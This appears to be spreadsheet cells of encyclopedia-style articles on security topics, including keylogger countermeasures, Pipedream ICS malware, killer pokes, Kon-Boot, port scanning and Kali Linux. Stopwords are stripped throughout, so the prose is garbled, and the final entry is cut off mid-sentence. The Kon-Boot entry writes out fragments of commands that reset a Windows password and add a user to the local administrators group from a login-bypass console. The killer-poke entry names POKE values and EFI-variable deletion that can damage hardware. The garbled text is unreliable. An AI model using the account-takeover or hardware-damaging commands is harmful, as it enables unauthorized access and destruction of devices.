keyloggers variety techniques capture data countermeasure needs effective particular data capture technique. case windows keylogging microsoft, changing certain privacy settings disable on-screen keyboard effective hardware keyloggers; transparency defeat some—but all—screen loggers. anti-spyware application disable hook-based keyloggers ineffective kernel-based keyloggers. keylogger program authors able update program's code adapt countermeasures proven effective anti-keyloggers anti-keylogger piece software specifically designed detect keyloggers computer, typically comparing files computer database keyloggers, looking similarities might indicate presence hidden keylogger. anti-keyloggers designed specifically detect keyloggers, potential effective conventional antivirus software; antivirus software consider keyloggers malware, circumstances keylogger considered legitimate piece software. live cd/usb rebooting computer using live write-protected live possible countermeasure software keyloggers clean malware operating system contained secured fully patched cannot infected soon started. booting different operating system impact hardware bios based keylogger. anti-spyware anti-virus programs many anti-spyware applications detect software based keyloggers quarantine, disable, remove them. however, many keylogging programs legitimate pieces software circumstances, anti-spyware often neglects label keylogging programs spyware virus. these applications detect software-based keyloggers based patterns executable code, heuristics keylogger behaviors (such hooks certain apis). software-based anti-spyware application 100% effective keyloggers. software-based anti-spyware cannot defeat non-software keyloggers (for example, hardware keyloggers attached keyboards always receive keystrokes software-based anti-spyware application). particular technique anti-spyware application uses influence potential effectiveness software keyloggers. general rule, anti-spyware applications higher privileges defeat keyloggers lower privileges. example, hook-based anti-spyware application cannot defeat kernel-based keylogger keylogger receive keystroke messages anti-spyware application), could potentially defeat hook- api-based keyloggers. network monitors network monitors (also known reverse-firewalls) used alert user whenever application attempts make network connection. this gives user chance prevent keylogger "phoning home" typed information. automatic form filler programs automatic form-filling programs prevent keylogging removing requirement user type personal details passwords using keyboard. form fillers primarily designed browsers fill checkout pages users accounts. once user's account credit card information entered program, automatically entered forms without ever using keyboard clipboard, thereby reducing possibility private data recorded. however, someone physical access machine still able install software intercept information elsewhere operating system transit network. (transport layer security (tls) reduces risk data transit intercepted network sniffers proxy tools.) one-time passwords (otp) using one-time passwords prevent unauthorized access account login details exposed attacker keylogger, password invalidated soon used. this solution useful someone using public computer. however, attacker remote control computer simply wait victim enter credentials performing unauthorized transactions behalf session active. security tokens smart cards security tokens improve security replay attacks face successful keylogging attack, accessing protected information would require (hardware) security token well appropriate password/passphrase. knowing keystrokes, mouse actions, display, clipboard, etc. used computer subsequently help attacker gain access protected resource. some security tokens work type hardware-assisted one-time password system, others implement cryptographic challenge–response authentication, improve security manner conceptually similar time passwords. smartcard readers associated keypads entry vulnerable keystroke logging so-called supply chain attack attacker substitutes card reader/pin entry hardware records user's pin. on-screen keyboards most on-screen keyboards (such on-screen keyboard comes windows send normal keyboard event messages external target program type text. software loggers typed characters sent program another. keystroke interference software keystroke interference software also available. these programs attempt trick keyloggers introducing random keystrokes, although simply results keylogger recording information needs attacker task extracting keystrokes interest—the security mechanism, specifically well stands cryptanalysis, unclear. speech recognition similar on-screen keyboards, speech-to-text conversion software also used keyloggers, since typing mouse movements involved. weakest point using voice-recognition software software sends recognized text target software user's speech processed. handwriting recognition mouse gestures many pdas lately tablet already convert (also called stylus) movements touchscreens computer understandable text successfully. mouse gestures principle using mouse movements instead stylus. mouse gesture programs convert strokes user-definable actions, typing text. similarly, graphics tablets light pens used input gestures, however, becoming less common.the potential weakness speech recognition applies technique well. macro expanders/recorders with help many programs, seemingly meaningless text expanded meaningful text time context-sensitively, e.g. "en.wikipedia.org" expanded browser window focus. biggest weakness technique programs send keystrokes directly target program. however, overcome using 'alternating' technique described below, i.e. sending mouse clicks non-responsive areas target program, sending meaningless keys, sending another mouse click target area (e.g. password field) switching back-and-forth. deceptive typing alternating typing login credentials typing characters somewhere else focus window cause keylogger record information needs could easily filtered attacker. similarly, user move cursor using mouse typing, causing logged keystrokes wrong order e.g., typing password beginning last letter using mouse move cursor subsequent letter. lastly, someone also context menus remove, cut, copy, paste parts typed text without using keyboard. attacker capture parts password larger space attack choose execute brute-force attack. another similar technique uses fact selected text portion replaced next typed. e.g., password "secret", could type "s", dummy keys "asdf". these dummy characters could selected mouse, next character password typed, replaces dummy characters "asdf". these techniques assume incorrectly keystroke logging software cannot directly monitor clipboard, selected text form, take screenshot every time keystroke mouse click occurs. they may, however, effective hardware keyloggers. also anti-keylogger black-bag cryptanalysis computer surveillance digital footprint hardware keylogger reverse connection session replay spyware trojan horse virtual keyboard tracking references external links media related keystroke logging wikimedia commons keyloggers curlie</t>
  </si>
  <si>
    <t>KY-57</t>
  </si>
  <si>
    <t>speech security equipment (vinson), tsec/ky-57, portable, tactical cryptographic device vinson family, designed provide voice encryption range military communication devices radio telephone. ky-57 nato allies towards cold war. device classified (controlled cryptographic item) unkeyed. classification device temporarily raised classification device keyed. authorized secret information appropriate key. longer authorized handling classified information, facto, officially, declassified. details technical operation still classified. first unit, serial number still operation nsa. ky-57 accept signal fades seconds without losing synchronization transmitting station. there storage positions keys. keys traffic encryption keys (tek). encryption (kek) used rekeying (otar) keys. must loaded manually using fill device an/cyz-10. also encryption systems fnbdt andvt sincgars an/prc-77 references</t>
  </si>
  <si>
    <t>Key wrap</t>
  </si>
  <si>
    <t>cryptography, wrap constructions class symmetric encryption algorithms designed encapsulate (encrypt) cryptographic material. wrap algorithms intended applications protecting keys untrusted storage transmitting keys untrusted communications networks. constructions typically built standard primitives block ciphers cryptographic hash functions. wrap considered form encapsulation algorithm, although confused commonly known asymmetric (public-key) encapsulation algorithms (e.g., psec-kem). wrap algorithms used similar application: securely transport session encrypting long-term encryption key. background late 1990s, national institute standards technology (nist) posed "key wrap" problem: develop secure efficient cipher-based encryption algorithms. resulting algorithms would formally evaluated nist, eventually approved nist-certified cryptographic modules. nist precisely define security goals resulting algorithm, left refinement algorithm developers. based resulting algorithms, design requirements appear confidentiality, integrity protection (authentication), efficiency, standard (approved) underlying primitives advanced encryption standard (aes) secure hash algorithm (sha-1), consideration additional circumstances (e.g., resilience operator error, low-quality random number generators). goals particularly important, given many widely deployed authenticated encryption algorithms (e.g., aes-ccm) already sufficient accomplish remaining goals. several constructions proposed. these include: wrap specification (november 2001, 3394) implemented webcrypto subtle api. american standards committee ansx9.102, defines four algorithms: aeskw variant wrap specification) tdkw (similar aeskw, built triple rather aes). akw1 (tdes, rounds cbc) akw2 (tdes, cbc-mac)each proposed algorithms considered form authenticated encryption algorithm providing confidentiality highly entropic messages cryptographic keys. wrap specification, aeskw, tdkw, akw1 intended maintain confidentiality adaptive chosen ciphertext attacks, akw2 algorithm designed secure known-plaintext weaker) attacks. (the stated goal akw2 legacy systems computationally limited devices algorithms would impractical.) aeskw, tdkw akw2 also provide ability authenticate cleartext "header", associated block data encrypted. rogaway shrimpton evaluated design ansx9.102 algorithms respect stated security goals. among general findings, noted lack clearly stated design goals algorithms, absence security proofs constructions. paper, rogaway shrimpton proposed provable key-wrapping algorithm (siv—the synthetic initialization vector mode) authenticates encrypts arbitrary string authenticates, encrypt, associated data bound wrapped key. this standardized mode 5297. also authenticated encryption deterministic encryption management offline private protocol further reading rogaway, shrimpton. provable-security treatment key-wrap problem. nist, wrap specification (november 2001) nist special publication 800-38f, recommendation block cipher modes operation: methods wrapping (december 2012) american standards committee, request review wrap algorithms harkins (october 2008). "rfc 5297: synthetic initialization vector (siv) authenticated encryption using advanced encryption standard (aes)". ietf. krohn, max; coyne, chris. "triplesec". keybase. archived original 2015. retrieved 2021. references</t>
  </si>
  <si>
    <t>Key whitening</t>
  </si>
  <si>
    <t>cryptography, whitening technique intended increase security iterated block cipher. consists steps combine data portions key. details common form whitening xor-encrypt-xor using simple first round last round encryption. first block cipher form whitening des-x, simply uses extra 64-bit keys whitening, beyond normal 56-bit des. this intended increase complexity brute force attack, increasing effective size without major changes algorithm. des-x's inventor, rivest, named technique whitening. cipher feal (followed khufu khafre) introduced practice whitening using portions used rest cipher. this offers additional protection brute force attacks, make attacks difficult. feistel cipher similar algorithm, whitening increase security concealing specific inputs first last round functions. particular, susceptible meet-in-the-middle attack. this form whitening adopted feature many later block ciphers, including aes, mars, rc6, twofish. also whitening transformation references schneier, bruce (1996). applied cryptography (2nd ed.). john wiley sons. 366–367. isbn 0-471-11709-9.</t>
  </si>
  <si>
    <t>Pipedream (toolkit)</t>
  </si>
  <si>
    <t>pipedream software framework malicious code targeting programmable logic controllers (plcs) industrial control systems (ics). first publicly disclosed 2022, described "swiss army knife" hacking. believed developed state-level advanced persistent threat actors.the name "pipedream" given cybersecurity company dragos; cybersecurity company mandiant uses name "incontroller". compared industroyer toolkit used december 2015 ukraine power grid cyberattack. dragos refers authors software chernovite. details toolkit consists custom-made tools that, established initial access operational technology (ot) network, enables scan for, compromise, control certain ics/scada devices, including following: schneider electric plcs, omron sysmac plcs, open platform communications unified architecture (opc servers.the toolkit modular architecture enables cyber actors conduct highly automated exploits targeted devices. tools virtual console command interface mirrors interface targeted ics/scada device. modules interact targeted devices, enabling operations lower-skilled cyber actors emulate higher-skilled actor capabilities.apt actors leverage modules scan targeted devices, conduct reconnaissance device details, upload malicious configuration/code targeted device, back restore device contents, modify device parameters.in addition, actors tool installs exploits known-vulnerable asrock-signed motherboard driver, asrdrv103.sys, exploiting cve-2020-15368 execute malicious code windows kernel. successful deployment tool allow actors move laterally within environment disrupt critical devices functions. also industroyer stuxnet havex triton (malware) references</t>
  </si>
  <si>
    <t>Killer poke</t>
  </si>
  <si>
    <t>computer jargon, killer poke method inducing physical hardware damage machine peripherals insertion invalid values, via, example, basic's poke command, memory-mapped control register. term typically used describe family fairly well known tricks overload analog electronics monitors computers lacking hardware sanity checking (notable examples portable commodore pet.) specific examples zuse z1/z3 (1938) (1941) computers built konrad zuse contained illegal sequences instructions damaged hardware executed accident. commodore pet-specific killer poke connected architecture machine's video rasterizer circuits. early pets, writing certain value memory address certain register (poke 59458,62) made machine able display text graphics screen 106% faster. this accomplished disabling “wait print screen” safeguard designed reduce static/noise preventing shared vram read display time written cpu. with safeguard disabled, graphics could appear screen twice fast, small bits static would also appear. despite static, games designed early pets included poke source code order benefit faster graphics.when range revamped updated hardware, video rasterizer circuits redesigned faster speed without need “wait print” safeguard. thus, poke trick longer resulted faster graphics. instead, performing trick hardware strange behavior video chip, could cause signal contention possibly damage pet's integrated monitor. this exact targeted poke command used control display timing, upgraded video chip, controlled vertical sync. thus, running poke newer hardware caused graphics compress vertically, sometimes extremely bright horizontal line. fears anomaly might burn display nickname “killer poke,” however, known ever caused permanent damage monitor. commodore 1541 disk drive commodore optional external 5-1/4" floppy drive. commodore 1541 contained 6502 microprocessor used commodore also manage drive mechanism. drives stored data tracks (#0–34), stepper motor could manually controlled basic print#-ing "memory-write" commands drive (which correspond poke command basic, write drive's internal memory registers, computer itself). drive either range (track track commanded continue moving, software firmware method prevent drive damage. continued "knocking" drive head stop would throw mechanism alignment. problem exacerbated copy protection techniques used non-standard disk formats unusual track counts. commodore 1571 optical head stop instead mechanical one. trs-80 model trs-80 model ability switch 32-character-wide display 64-character display. doing actuated relay video hardware, accomplished writing specific memory-mapped control register. programs repeatedly switched 64-character modes high speed (either purpose accidentally) could permanently damage video hardware. while single "killer poke", demonstrates software failure mode could permanently damage hardware. cassette tape relay trs-80 color computer, pcjr, nascom, msx, amstrad cpc, micro acorn computers contained built-in relay controlling external tape recorder. toggling motor control relay tight loop would reduce relay's longevity. commodore amiga floppy drive commodore amiga personal computer could made produce noises various pitches making drive heads move back forth. program existed could play cóndor pasa, less correctly, amiga's floppy drive. sounds relied head assembly hitting stop, gradually sent head alignment. cd-rom drives certain models cd-rom drives specific firmware used abnormal command "update firmware": "clear buffer" command usually used cd-rw drives. linux uses command tell difference cd-rom cd-rw drives. most cd-rom drives dependably return error unsupported cd-rw command, faulty drives interpreted "update firmware", causing stop working (or, casual parlance, "bricked"). laptops uefi systemd mounts variables used unified extensible firmware interface linux system's sysfs writable root user system. result, possible root user system completely brick system non-conforming uefi implementation (specifically laptops) using command delete /sys/firmware/efi/efivars/ directory, recursively delete root directory. game game boy's screen turned game software. doing outside vertical blanking interval allegedly damage hardware. dragon dragon clock speed defined programmable clock divider could programmed user increase speed 100% theoretically, 150% (though selecting speed caused system crash.) installed cpu, 6809e originally rated 1mhz dragon running 0.89mhz. speed uplift 1.33mhz appeared mostly stable whereas uplift 1.78mhz would cause video sync lost. publicised time increased heat produced speed increase would eventually damage cpu. poke 65495, allowed double speed graphics still displayed properly. poke 65497, lost video sync. also (halt catch fire) pentium f00f scratch monkey stuxnet, malware designed cause physical wear industrial centrifuges bricking, misconfiguring device make cease functioning (computer virus) references external links commodore killer poke discussion</t>
  </si>
  <si>
    <t>Port triggering</t>
  </si>
  <si>
    <t>port triggering configuration option nat-enabled router controls communication internal external host machines network. similar port forwarding enables incoming traffic forwarded specific internal host machine, although forwarded port open permanently target internal host machine chosen dynamically. description when networks communicate nat-router, host machines internal network behave address nat-router perspective host machines external network. without traffic forwarding rules, impossible host machine external network (host open connection host machine internal network (host this connection targeted nat-router, since internal network hidden behind nat. with port triggering, host opens connection host using predefined port ports, incoming traffic router receives predefined port ports forwarded host this 'triggering' event forwarding rule. forwarding rule disabled period inactivity.port triggering useful network applications client server roles must switched certain tasks, authentication chat file downloading file sharing. example example port triggering operates, connecting (internet relay chat), common authenticate username ident protocol port 113. when connecting irc, client computer typically makes outgoing connection port 6667 port range 6660–7000), causing server attempt verify username given making connection back client computer port 113. when computer behind nat, device silently drops connection know computer behind send request connect. these transport-level connections necessary application-level connection server succeed (see internet protocol suite). since second tcp/ip connection possible, attempted connection server fail. case port triggering, router configured outbound connection established port 6660 7000, allow inbound connections particular computer port 113. this gives flexibility static port forwarding necessary specific address network, allowing multiple clients connect servers nat-router. security also gained, sense inbound port left open actively use. disadvantages port triggering disadvantage binds triggered port single client time. long port bound particular client, port triggering effectively unavailable clients. file sharing, example, means clients download files server running "active mode" simultaneously. irc, even though authentication step happens quickly, port triggering timeout still prevent clients logging servers. port triggering unsuitable servers behind router relies local computer make outgoing connection receive incoming ones. routers possible client port triggering port forwarding, simultaneously. also network address port translation traversal port forwarding references</t>
  </si>
  <si>
    <t>Laplink PCmover</t>
  </si>
  <si>
    <t>laplink pcmover migration software developed laplink software. introduced 2005, successor laplink, pcmover comes variety versions provide ability move restore selected files, folders, settings, user profiles programs one, operating system one, hard drive one. microsoft partnered laplink multiple occasions recommends pcmover automatically moving programs, files profile setting windows pcs. versions pcmover enterprise pcmover enterprise transfers installed applications, settings, data user accounts. pcmover enterprise automates migration process in-place upgrades, refreshes break-fix recovery scenarios. enterprise utilize policy files controlling company-wide migrations. product used large enterprises support 100,000 migrations, example, windows windows pcmover professional pcmover professional provides migration tools covering windows operating systems migration scenarios. offers user interface walks users migration process. files, folders settings source integrated directly target system. pcmover profile migrator (ppm) pcmover profile migrator (ppm) migrates applications, files settings user profiles computer. this tool automates process transitioning users local active directory azure active directory. pcmover home pcmover home released 2009. allows users migrate files, personalized settings applications pcmover home several limitations: cannot drive partition, moves logged user, support in-place upgrades, cannot restore image. pcmover express pcmover express automatically transfers windows files, user personalized setting older windows windows limitation move applications. microsoft made pcmover express free users 2015 year encourage users upgrade latest versions operating systems. pcmover image drive assistant pcmover image drive assistant allows user create image existing hard drive restore image used restore image windows hard drive different windows operating system complete files, settings programs without overwriting anything including operating system. pcmover windows store edition this edition pcmover provides support windows users want migrate computer operating mode. software downloaded windows store free charge limited transferring data. pcmover express windows march 2014, laplink partnered microsoft offer windows users free data migration tool move windows computer windows computer microsoft's deprecation windows easy transfer. pcmover express windows transfer files, settings user profiles, transfer applications. pcmover windows upgrade assistant pcmover windows upgrade assistant released october 2009. allows user perform in-place upgrade windows vista windows pcmover windows upgrade assistant automatically restore selected files, personalized settings applications windows operating system windows without overwriting operating system. compatible applications also installed. pcmover windows upgrade assistant pcmover windows upgrade assistant released january 2012. allows user perform in-place upgrade windows vista windows pcmover windows upgrade assistant automatically restore selected files, personalized settings applications windows operating system windows without overwriting operating system. compatible applications also installed. reception laplink's pcmover software reviewed publications globally. tech radar stated impressed software none files missing applications worked right away. world said pros pcmover software migrates data applications “like magic” includes data transfer cable. cons handle complex migrations gracefully unclear instructions. barron's gave pcmover professional stars ability make moving computer quick easy. windows report called pcmover best tool moving windows windows references</t>
  </si>
  <si>
    <t>Laplink</t>
  </si>
  <si>
    <t>laplink (stylized laplink) proprietary piece software developed mark eppley sold traveling software, laplink software, inc. first available 1983, laplink used synchronize, copy, move, files pcs, local area networks, using parallel port laplink cable serial port null modem cable adhoc network cable.laplink predecessor laplink pcmover. laplink typically shipped laplink cable link together, enabling transfer files using laplink software. references</t>
  </si>
  <si>
    <t>Pirni</t>
  </si>
  <si>
    <t>pirni network security tool designed ios, specifically iphone ipod touch devices. capable intercepting traffic wireless network segment, capturing passwords, regular expressions entered user. core system pirni, written open-source software, licensed general public license. pirni succeeding version pirni, commercial software, available cydia store, jailbroken apple devices. features pirni supports active dissection non-ciphered protocols (given user supplied regular expression dissection). application description contains following: spoof entire network target watch live feed interesting packets collected manage regular expressions filter data, site credentialsin addition, software also offers following features: password collectors for: http external links root everything official website cydia link extensive tutorial references</t>
  </si>
  <si>
    <t>Key schedule</t>
  </si>
  <si>
    <t>cryptography, so-called product ciphers certain kind cipher, (de-)ciphering data typically done iteration rounds. setup round generally same, except round-specific fixed values called round constant, round-specific data derived cipher called round key. schedule algorithm calculates round keys key. some types schedules some ciphers simple schedules. example, block cipher splits 128-bit four 32-bit pieces uses repeatedly successive rounds. schedule 56-bit divided 28-bit halves; half thereafter treated separately. successive rounds, halves rotated left bits (specified round), round bits selected permuted choice (pc-2) bits left half right. rotations effect different bits used round key; used approximately round keys. avoid simple relationships cipher round keys, order resist forms cryptanalysis related-key attacks slide attacks, many modern ciphers elaborate schedules generate "expanded key" round keys drawn. some ciphers, rijndael (aes) blowfish, operations used data path cipher algorithm expansion, sometimes initialized "nothing-up-my-sleeve numbers". other ciphers, rc5, expand keys functions somewhat completely different encryption functions. notes knudsen mathiassen (2004) give experimental evidence indicate schedule plays part providing strength linear differential cryptanalysis. feistel ciphers, observed complex well-designed schedules reach uniform distribution probabilities differentials linear hulls faster poorly designed schedules. references lars knudsen john erik mathiassen, role schedules attacks iterated ciphers, esorics 2004, pp322–334. blumenthal steven bellovin, better schedule des-like ciphers, proceedings pragocrypt '96.</t>
  </si>
  <si>
    <t>Kon-Boot</t>
  </si>
  <si>
    <t>kon-boot (aka konboot, boot) software utility allows users bypass microsoft windows passwords apple macos passwords (linux support deprecated) without lasting persistent changes system executed. also first reported tool capable bypassing windows online (live) passwords supporting windows macos systems. also widely used tool computer security, especially penetration testing. since version kon-boot also able bypass secureboot feature. history kon-boot originally designed proof concept, freeware security tool, mostly people tend forget passwords. main idea allow users login target computer without knowing correct password without making persistent changes system executed. first kon-boot release announced 2008 dailydave mailing list. version (freeware) allowed users login linux based operating systems bypass authentication process (allowing access system without knowing password). 2009 author software announced kon-boot linux 32-bit microsoft windows systems. this release provided additional support bypassing windows systems passwords windows operating system starting windows server 2008 windows this version still available freewarenewest kon-boot releases available commercial products still maintained. commercial versions software licenses software drive license. commercial version software comes versions personal commercial personal months free updates commercial months free updates.current version able bypass passwords following operating systems: technology kon-boot works like bootkit (thus also often creates false positive alerts antivirus software). injects (hides) bios memory. kon-boot modifies kernel code (runtime), temporarily changing code responsible verification user's authorization data operating system loads. contrast password reset tools like chntpw (the offline password editor), kon-boot modify system files hive, changes temporary disappear system reboots. additional features while default kon-boot bypasses windows passwords also includes additional features worth noting: kon-boot change windows passwords embedded sticky-keys feature. example successful windows boot kon-boot user shift times kon-boot open windows console window running local system privileges. fully working console used variety purposes. example case changing windows password following command used: user [username] [newpassword](selected user later added windows administrator typing: localgroup administrators [username] /add). similarly following command: user [username] erase current windows password selected user. obviously many actions available since windows console running system privileges. commercial kon-boot editions possible automatic powershell script execution feature automatically executes (after windows boot) given powershell script full system privileges. this feature used automatize various tasks example performing forensics data gathering task etc. feature windows needs installed uefi mode. limitations (prevention) users concerned tools like kon-boot disk encryption (filevault, bitlocker, veracrypt etc.) software kon-boot able bypass disk encryption. bios password enabled secureboot feature also good prevention measure. however kon-boot since version able bypass secureboot feature. kon-boot support virtualization instructs users turn bios. kon-boot support devices apple's chip. references external links official website</t>
  </si>
  <si>
    <t>Port scanner</t>
  </si>
  <si>
    <t>port scanner application designed probe server host open ports. such application used administrators verify security policies networks attackers identify network services running host exploit vulnerabilities. port scan portscan process sends client requests range server port addresses host, goal finding active port; nefarious process itself. majority uses port scan attacks, rather simple probes determine services available remote machine. portsweep scan multiple hosts specific listening port. latter typically used search specific service, example, sql-based computer worm portsweep looking hosts listening port 1433. tcp/ip basics design operation internet based internet protocol suite, commonly also called tcp/ip. system, network services referenced using components: host address port number. there 65535 distinct usable port numbers, numbered 1..65535. (port zero usable port number.) most services one, limited range port numbers. some port scanners scan common port numbers, ports commonly associated vulnerable services, given host. result scan port usually generalized three categories: open accepted: host sent reply indicating service listening port. closed denied listening: host sent reply indicating connections denied port. filtered, dropped blocked: there reply host.open ports present vulnerabilities administrators must wary: security stability concerns associated program responsible delivering service open ports. security stability concerns associated operating system running host open closed ports.filtered ports tend present vulnerabilities. assumptions forms port scanning rely assumption targeted host compliant transmission control protocol. although case time, still chance host might send back strange packets even generate false positives tcp/ip stack host non-rfc-compliant altered. this especially true less common scan techniques os-dependent (fin scanning, example). tcp/ip stack fingerprinting method also relies types different network responses specific stimulus guess type operating system host running. types scans scanning simplest port scanners operating system's network functions generally next option feasible option (described next). nmap calls mode connect scan, named unix connect() system call. port open, operating system completes three-way handshake, port scanner immediately closes connection avoid performing denial-of-service attack. otherwise error code returned. this scan mode advantage user require special privileges. however, using network functions prevents low-level control, scan type less common. this method "noisy", particularly "portsweep": services sender address intrusion detection systems raise alarm. scanning scan another form scanning. rather using operating system's network functions, port scanner generates packets itself, monitors responses. this scan type also known "half-open scanning", never actually opens full connection. port scanner generates packet. target port open, respond syn-ack packet. scanner host responds packet, closing connection handshake completed. port closed unfiltered, target instantly respond packet. networking several advantages, giving scanner full control packets sent timeout responses, allowing detailed reporting responses. there debate scan less intrusive target host. scan advantage individual services never actually receive connection. however, handshake cause problems network stacks, particular simple devices like printers. there conclusive arguments either way. scanning scanning also possible, although technical challenges. connectionless protocol equivalent packet. however, packet sent port open, system respond icmp port unreachable message. most port scanners scanning method, absence response infer port open. however, port blocked firewall, method falsely report port open. port unreachable message blocked, ports appear open. this method also affected icmp rate limiting.an alternative approach send application-specific packets, hoping generate application layer response. example, sending query port result response, server present. this method much reliable identifying open ports. however, limited scanning ports application specific probe packet available. some tools (e.g., nmap) generally probes less services, commercial tools many cases, service listening port, configured respond particular probe packet. scanning scanning unusual scan types, exactly determine whether port open closed, whether port filtered unfiltered. this especially good attempting probe existence firewall rulesets. simple packet filtering allow established connections (packets set), whereas sophisticated stateful firewall might not. window scanning rarely used outdated nature, window scanning fairly untrustworthy determining whether port opened closed. generates packet scan, checks whether window field packet modified. when packet reaches destination, design flaw attempts create window size packet port open, flagging window field packet returns sender. using scanning technique systems longer support implementation returns window field, labeling open ports closed. scanning since scans surreptitious enough, firewalls are, general, scanning blocking packets form packets. packets bypass firewalls without modification. closed ports reply packet appropriate packet, whereas open ports ignore packet hand. this typical behavior nature tcp, ways inescapable downfall. other scan types some unusual scan types exist. these various limitations widely used. nmap supports these. x-mas null scan similar scanning, but:x-mas sends packets fin, push flags turned like christmas tree null sends packet flags protocol scan determines level protocols (tcp, udp, gre, etc.) enabled. proxy scan proxy (socks http) used perform scan. target proxy's address source. this also done using servers. idle scan another method scanning without revealing one's address, taking advantage predictable flaw. catscan checks ports erroneous packets. icmp scan determines host responds icmp requests, echo (ping), netmask, etc. port filtering isps many internet service providers restrict customers' ability perform port scans destinations outside home networks. this usually covered terms service acceptable policy customer must agree. some isps implement packet filters transparent proxies prevent outgoing service requests certain ports. example, provides transparent http proxy port port scans address appear port open, regardless target host's actual configuration. ethics information gathered port scan many legitimate uses including network inventory verification security network. port scanning can, however, also used compromise security. many exploits rely upon port scans find open ports send specific data patterns attempt trigger condition known buffer overflow. such behavior compromise security network computers therein, resulting loss exposure sensitive information ability work.the threat level caused port scan vary greatly according method used scan, kind port scanned, number, value targeted host administrator monitors host. port scan often viewed first step attack, therefore taken seriously disclose much sensitive information host. despite this, probability port scan alone followed real attack small. probability attack much higher port scan associated vulnerability scan. legal implications because inherently open decentralized architecture internet, lawmakers struggled since creation define legal boundaries permit effective prosecution cybercriminals. cases involving port scanning activities example difficulties encountered judging violations. although cases rare, time legal process involves proving intent commit break-in unauthorized access existed, rather performance port scan. june 2003, israeli, mizrahi, accused israeli authorities offense attempting unauthorized access computer material. port scanned mossad website. acquitted charges february 2004. judge ruled kinds actions discouraged performed positive way.a 17-year-old finn accused attempted computer break-in major finnish bank. april 2003, convicted charge supreme court finland ordered us$12,000 expense forensic analysis made bank. 1998, port scanned bank network attempt access closed network, failed so.in 2006, parliament voted amendment computer misuse 1990 person guilty offence "makes, adapts, supplies offers supply article knowing designed adapted course connection offence section cma]". nevertheless, area effect amendment blurred, widely criticized security experts such.germany, strafgesetzbuch 202a,b,c also similar law, council european union issued press release stating plan pass similar too, albeit precise. united states moulton december 1999, scott moulton arrested accused attempted computer trespassing georgia's computer systems protection computer fraud abuse america. time, service company ongoing contract cherokee county georgia maintain upgrade center security. performed several port scans cherokee county servers check security eventually port scanned server monitored another company, provoking tiff ended tribunal. acquitted 2000, judge thomas thrash ruling moulton (n.d. 2000) damage impairing integrity availability network. also content vectoring protocol list port numbers service scan references external links teo, lawrence (december, 2000). network probes explained: understanding port scans ping sweeps. linux journal, retrieved september 2009, linuxjournal.com</t>
  </si>
  <si>
    <t>Kali Linux</t>
  </si>
  <si>
    <t>kali linux debian-derived linux distribution designed digital forensics penetration testing. maintained funded offensive security.kali linux around penetration-testing programs (tools), including armitage graphical cyber attack management tool), nmap port scanner), wireshark packet analyzer), metasploit (penetration testing framework), john ripper password cracker), sqlmap (automatic injection database takeover tool), aircrack-ng software suite penetration-testing wireless lans), burp suite owasp application security scanners, etc.it developed mati aharoni devon kearns offensive security rewrite backtrack, previous information security testing linux distribution based knoppix. name inspired hindu goddess kali.kali linux based debian testing branch. most packages kali uses imported debian repositories.kali linux's popularity grew featured multiple episodes series robot. tools highlighted show provided kali linux include bluesniff, bluetooth scanner (btscanner), john ripper, metasploit framework, nmap, shellshock, wget.the tagline kali linux backtrack "the quieter become, able hear", displayed backgrounds. version history first version, 1.0.0 "moto", released march 2013.with version 2019.4 november 2019, default user interface switched gnome xfce, gnome version still available.with version 2020.3 august 2020, default shell switched bash zsh, bash remaining option. requirements kali linux requires: minimum 20gb hard disk space installation depending version, version 2020.2 requires least 20gb. minimum i386 amd64 architectures. bootable cd-dvd drive stick. minimum intel core processor good performance.the recommended hardware specification smooth experience are: hard disk space, preferred least supported platforms kali linux distributed 32-bit 64-bit images hosts based instruction image architecture beagle board computer samsung's chromebook.the developers kali linux make kali linux available even devices.kali linux already available asus chromebook flip c100p, beaglebone black, chromebook, cubieboard cubox, cubox-i, raspberry efikamx, odroid odroid odroid xu3, samsung chromebook, utilite pro, galaxy note 10.1, ss808.with arrival kali nethunter, kali linux also officially available android devices nexus nexus nexus nexus nexus oneplus one, samsung galaxy models. also made available android devices unofficial community builds. kali linux available windows windows subsystem linux (wsl). official kali distribution windows downloaded microsoft store. features kali linux dedicated project aside compatibility porting specific android devices, called kali nethunter.it first open source android penetration testing platform nexus devices, created joint effort kali community member "binkybear" offensive security. supports wireless 802.11 frame injection, one-click mana evil access point setups, keyboard (teensy like attacks), well mitm attacks.backtrack (kali's predecessor) contained mode known forensic mode, carried kali live boot. this mode popular many reasons, partly many kali users already bootable kali drive option makes easy apply kali forensic job. when booted forensic mode, system touch internal hard drive swap space auto mounting disabled. however, developers recommend users test features extensively using kali real world forensics. comparison kali linux with other linux distributions kali linux developed focus towards cyber security experts, penetration testers, white-hat hackers. there distributions dedicated penetration testing, parrot blackarch, wifislax kali linux stood distributions cyber security penetration testing, well features default user superuser kali live environment. tools kali linux includes security tools, these tools used number purposes, involve exploiting victim network application, performing network discovery, scanning target address. many tools previous version (backtrack) eliminated focus popular effective penetration testing applications. offensive security provides book, kali linux revealed, makes available free download. also kali nethunter backbox ubuntu list digital forensic tools openvas parrot security blackarch security-focused operating system raspberry references external links official website kali linux distrowatch official twitter kali linux distrotest, free online emulator operating systems.</t>
  </si>
  <si>
    <t>Secure telephone</t>
  </si>
  <si>
    <t>secure telephone telephone provides voice security form end-to-end encryption telephone call, cases also mutual authentication call parties, protecting man-in-the-middle attack. concerns massive growth telephone tapping incidents growing demand secure telephones. practical availability secure telephones restricted several factors; notably politics, export issues, incompatibility different products (the devices side call protocol), high (though recently decreasing) price devices. well-known products best-known product government market stu-iii family. however, system replaced secure terminal equipment (ste) scip standards defines specifications design equipment secure data voice. scip standard developed derive interoperability secure communication equipment. family standard secure phones developed based philip zimmermann's voip encryption standard zrtp. voip direct connection phones popularity voip grows, secure telephony becoming widely used. many major hardware software providers offer standard feature extra cost. examples include gizmo5 twinkle. both former work offerings founder pgp, phil zimmermann, voip secure protocol, zrtp. zrtp implemented amongst others, ripcord networks product securepc suite compliant elliptic curve math libraries. zrtp also made available mobile standard non-voip secure calls. u.s. national security agency developing secure phone based google's android called fishbowl. historically significant products scramblers used secure voice traffic world often intercepted decoded scrambling's inherent insecurity. first true secure telephone sigsaly, massive device weighed tons. nsa, formed world developed series secure telephones, including stu-iii, well voice encryption devices military telephones. 1989 irish company called intrepid developed advanced secure phones. called milcode, phone first implement code-excited linear prediction celp) dramatically improved voice quality user operability previous (linear predictive coding) lpc-10e versions. milcode also boasted significantly higher levels security previous secure telephones. base model offered proprietary encryption algorithm length bits, advanced model length 1024 bits. exchange used public key, based diffie-hellman, opposed plug-in datakey. generated phone call. milcode also able encrypt data electromagnetically shielded nato tempest standards. other products historical significance pgpfone nautilus (designed 